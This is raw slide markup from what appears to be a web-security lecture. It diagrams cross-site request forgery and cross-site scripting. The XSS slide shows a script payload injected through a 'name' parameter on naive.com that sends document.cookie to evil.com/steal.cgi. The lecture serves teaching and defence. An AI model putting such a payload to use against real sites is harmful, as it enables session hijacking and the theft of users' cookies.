              <a:rPr lang="en-US" sz="28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Attack server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114696" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8042767" y="2032000"/>
            <a:ext cx="2184407" cy="562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pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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Server victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69639" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3452143" y="3210560"/>
            <a:ext cx="4025617" cy="87827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4698" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="598213" y="6041813"/>
            <a:ext cx="1937369" cy="562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pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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User victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114699" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="4080288" y="2947520"/>
            <a:ext cx="2642891" cy="562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pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69642" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2600961" y="6502400"/>
            <a:ext cx="4133992" cy="151722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4701" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="3936365" y="3965779"/>
            <a:ext cx="3165545" cy="562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pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69644" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3235396" y="5635414"/>
            <a:ext cx="4025617" cy="140885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4703" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4337193" y="5788942"/>
            <a:ext cx="2352604" cy="568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046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>visit server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114704" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3124765" y="6687538"/>
            <a:ext cx="4170116" cy="568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046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69647" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3382152" y="3273778"/>
            <a:ext cx="519289" cy="51928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lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69648" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3924018" y="5310294"/>
            <a:ext cx="519289" cy="51928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lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69649" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2777067" y="5915378"/>
            <a:ext cx="519289" cy="51928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lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69650" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3467948" y="4215272"/>
            <a:ext cx="4025618" cy="8782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651" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3142827" y="4443307"/>
            <a:ext cx="519289" cy="51928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lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114710" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1493111" y="8669867"/>
            <a:ext cx="7234743" cy="562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0046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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Q: how long do you stay logged on to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty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the Bank?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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9653" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10187094" y="8886613"/>
            <a:ext cx="2709333" cy="65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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr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spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{19F8D65C-30F6-9E42-A158-CA3EB142BC8F}" type="slidenum">
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="17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25375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0187095" y="8886613"/>
            <a:ext cx="2709333" cy="6502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39" tIns="65020" rIns="130039" bIns="65020"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3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1pPr>
            <a:lvl2pPr marL="1056569" indent="-406374">
              <a:defRPr sz="3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2pPr>
            <a:lvl3pPr marL="1625492" indent="-325098">
              <a:defRPr sz="3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3pPr>
            <a:lvl4pPr marL="2275688" indent="-325098">
              <a:defRPr sz="3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4pPr>
            <a:lvl5pPr marL="2925885" indent="-325098">
              <a:defRPr sz="3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5pPr>
            <a:lvl6pPr marL="3576081" indent="-32509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3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6pPr>
            <a:lvl7pPr marL="4226278" indent="-32509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3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7pPr>
            <a:lvl8pPr marL="4876475" indent="-32509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3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8pPr>
            <a:lvl9pPr marL="5526671" indent="-32509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3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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{57416F0A-417C-B243-9C78-3C3DD64E0533}" type="slidenum">
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="+mn-cs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3004800" cy="1060376"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130942" tIns="65471" rIns="130942" bIns="65471"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>XSS: Cross-Site Scripting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5530303" y="2253263"/>
            <a:ext cx="1352660" cy="734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39" tIns="65020" rIns="130039" bIns="65020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>
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258501" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6827520" y="3445371"/>
            <a:ext cx="4009813" cy="456071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30039" tIns="65020" rIns="130039" bIns="65020"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="280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258502" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8019629" y="3359575"/>
            <a:ext cx="1298223" cy="4390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lIns="130039" tIns="65020" rIns="130039" bIns="65020">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000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650240" y="3467949"/>
            <a:ext cx="1192107" cy="5396089"/>
          </a:xfrm>
          <a:prstGeom prst="rect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30039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="280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643388" y="2488073"/>
            <a:ext cx="1379660" cy="439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39" tIns="65020" rIns="130039" bIns="65020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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>evil.com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5960533" y="3467949"/>
            <a:ext cx="866987" cy="5396089"/>
          </a:xfrm>
          <a:prstGeom prst="rect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30039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="280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10837333" y="3382153"/>
            <a:ext cx="1192107" cy="5396089"/>
          </a:xfrm>
          <a:prstGeom prst="rect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30039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="280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842348" y="4118188"/>
            <a:ext cx="4118187" cy="541867"/>
            <a:chOff x="816" y="1824"/>
            <a:chExt cx="1824" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12322" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="816" y="1920"/>
              <a:ext cx="1824" cy="14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en-US" sz="280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40995" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1056" y="1824"/>
              <a:ext cx="1242" cy="1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2000" dirty="0">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Access some web page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842348" y="4768430"/>
            <a:ext cx="4118187" cy="1433690"/>
            <a:chOff x="816" y="2112"/>
            <a:chExt cx="1824" cy="635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12320" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="816" y="2208"/>
              <a:ext cx="1824" cy="14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en-US" sz="280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40993" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="912" y="2112"/>
              <a:ext cx="1584" cy="6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70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&lt;FRAME SRC=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>naive.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>hello.cgi</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>name=&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>win.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>evil.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>steal.cgi</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>cookie=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>+</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258513" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2167468" y="6610773"/>
            <a:ext cx="3467947" cy="975360"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21287"/>
              <a:gd name="adj2" fmla="val -88194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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lIns="130039" tIns="65020" rIns="130039" bIns="65020"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Forces victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s browser to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>call hello.cgi on naive.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>with this script as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="B2B2B2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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6827520" y="4985173"/>
            <a:ext cx="4009813" cy="1004712"/>
            <a:chOff x="3024" y="2208"/>
            <a:chExt cx="1776" cy="445"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12318" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3024" y="2304"/>
              <a:ext cx="1776" cy="144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en-US" sz="280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40991" name="Text Box 20"/>
